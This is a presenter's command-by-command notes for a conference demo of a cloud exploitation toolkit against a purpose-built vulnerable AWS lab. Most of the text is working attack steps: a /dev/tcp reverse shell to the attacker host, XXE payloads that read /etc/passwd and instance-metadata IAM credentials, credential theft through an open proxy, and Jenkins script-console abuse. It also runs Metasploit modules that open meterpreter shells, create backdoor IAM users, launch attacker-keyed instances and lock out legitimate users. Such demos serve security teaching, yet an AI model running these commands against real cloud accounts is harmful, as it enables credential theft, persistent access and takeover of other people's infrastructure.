By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.
References:
- Blackhat Arsenal 2017 presentation: https://www.blackhat.com/us-17/arsenal.html#cumulus-a-cloud-exploitation-toolkit
- Cumulus - A Cloud Exploitation Toolkit: https://drive.google.com/file/d/0B2Ka7F_6TetSNFdfbkI1cnJHUTQ
- The code, see cumulus branch: https://github.com/godinezj/metasploit-framework
- xxe-example, see https://github.com/rgerganov/xxe-example
- Create 2 AWS accounts & peer VPCs between them
- Account A, create the following instances with a role named
goat
giving it full admin rights - Configure an SSH host to accept passwords
- Install and run xxe-example
- Install Squid proxy
- Account B, create the following instance giving it EC2 Full Privs & iam:PassRole
- Install Jenkins, disable auth
- Update security groups to allow all traffic to/from attack host to victim hosts
Attacker:
- IP: <ATTACKER_HOST_IP>
- ssh attacker
Victims
- Account A
- SSH Goat <SSH_HOST_IP>
- XXE Goat <XXE_HOST_IP>
- Proxy <PROXY_HOST_IP>
- Account B
- Jenkins <JENKINS_HOST_IP>
nc -l 53
bash -i >& /dev/tcp/<ATTACKER_HOST_IP>/53 0>&1
python -c 'import pty;pty.spawn("/bin/bash")'
ssh admin@<SSH_HOST_IP>
curl http://169.254.169.254/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/goat
Jenkins > Manage Jenkins > Script Console
def sout = new StringBuffer(), serr = new StringBuffer()
def proc ='ls /'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout
Replace 'ls /' with:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
$ cat book.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<book>
<title>Programming pearls</title>
<isbn>8177588583</isbn>
<author>Jon Bentley</author>
</book>
$ cat book-xxe.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE bar [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<book>
<author>&xxe;</author>
<isbn>11112222333</isbn>
<title>Metasploit Unleashed</title>
</book>
$ cat book-xxe-meta.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE bar [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/goat">
]>
<book>
<author>&xxe;</author>
<isbn>11112222333</isbn>
<title>Metadata Credentials</title>
</book>
curl http://<XXE_HOST_IP>:8080/rest/books
cat book.xml
curl -H "Content-Type:application/xml" --upload-file book.xml http://<XXE_HOST_IP>:8080/rest/books
cat book-xxe.xml
curl -H "Content-Type:application/xml" --upload-file book-xxe.xml http://<XXE_HOST_IP>:8080/rest/books
cat book-xxe-meta.xml
curl -H "Content-Type:application/xml" --upload-file book-xxe-meta.xml http://<XXE_HOST_IP>:8080/rest/books
nmap -PN -p3128 <PROXY_HOST_IP>
export http_proxy=http://<PROXY_HOST_IP>:3128
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/goat
unset http_proxy
export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_SESSION_TOKEN=
aws ec2 describe-instances
./msfconsole
clear
Get a meterpreter shell
use exploit/multi/ssh/sshexec
set USERNAME admin
set PASSWORD admin
set RHOST <SSH_HOST_IP>
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <ATTACKER_HOST_IP>
exploit
sessions
use post/multi/escalate/aws_create_iam_user
show options
set IAM_GROUPNAME devsecops_a
set IAM_USERNAME devsecops_a
set CREATE_API false
set SESSION 1
run
Go to https://<AWS_ACCOUNT_A>.signin.aws.amazon.com/console login
Go to VPC, see peered connection...
clear
sessions -i 1
shell
python -c 'import pty;pty.spawn("/bin/bash")'
nmap -sP 10.10.0.0/24 -T5
nmap 10.10.0.230
curl http://10.10.0.230:8080 | head
sudo iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80 -j DNAT --to 10.10.0.230:8080
sudo iptables -A FORWARD -p tcp -d 10.10.0.230 --dport 8080 -j ACCEPT
sudo iptables -t nat -A POSTROUTING -j MASQUERADE
sudo sysctl -w net.ipv4.ip_forward=1
exit
exit
background
use exploit/multi/http/jenkins_script_console
set TARGETURI /
set RHOST <SSH_HOST_IP>
set RPORT 80
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <ATTACKER_HOST_IP>
set target 1
run
execute -f /bin/bash -i -H
python -c 'import pty;pty.spawn("/bin/bash")'
aws iam create-user --user-name testuser
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/goat
exit
exit
backgroud
use auxiliary/admin/aws/aws_launch_instances
show options
set AccessKeyId ...
set SecretAccessKey ...
set Token ...
set KEY_NAME admin
cat ~/.ssh/id_rsa.pub
set SSH_PUB_KEY ...
set ROLE_NAME admin
set SEC_GROUP_CIDR <ATTACKER_HOST_IP>/32
run
clear
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS <NEW_HOST_IP>
set KEY_PATH ~/.ssh/id_rsa
set USERNAME ec2-user
run
clear
use post/multi/escalate/aws_create_iam_user
show options
set IAM_GROUPNAME devsecops_b
set IAM_USERNAME devsecops_b
set CREATE_API true
set CREATE_CONSOLE true
set SESSION 3
run
https://<AWS_ACCOUNT_B>.signin.aws.amazon.com/console
Please remember, never do this on a production environment and/or without permission.
use auxiliary/admin/aws/aws_lock_users
show options
set AccessKeyId
set SecretAccessKey
set DRY_RUN false
run
Account A
- Remove group
- Remove user
Account B
- remove user
- remove group
- Enable other users: bgates, sjobs, ltorvalds
- Terminate new host
- remove keypair
- remove Security group
XXE-Cleanup
- ssh xxe-goat
- killall java
- nohup mvn jetty:run &
- ps auxw|grep tmp
- kill ...
Jenkins
- ssh jenkins
- ps auxw|grep tmp
- kill ...
See if meterpreter lives
- use exploit/multi/handler
- set payload linux/x86/meterpreter/reverse_tcp
- set LHOST <ATTACKER_HOST_IP>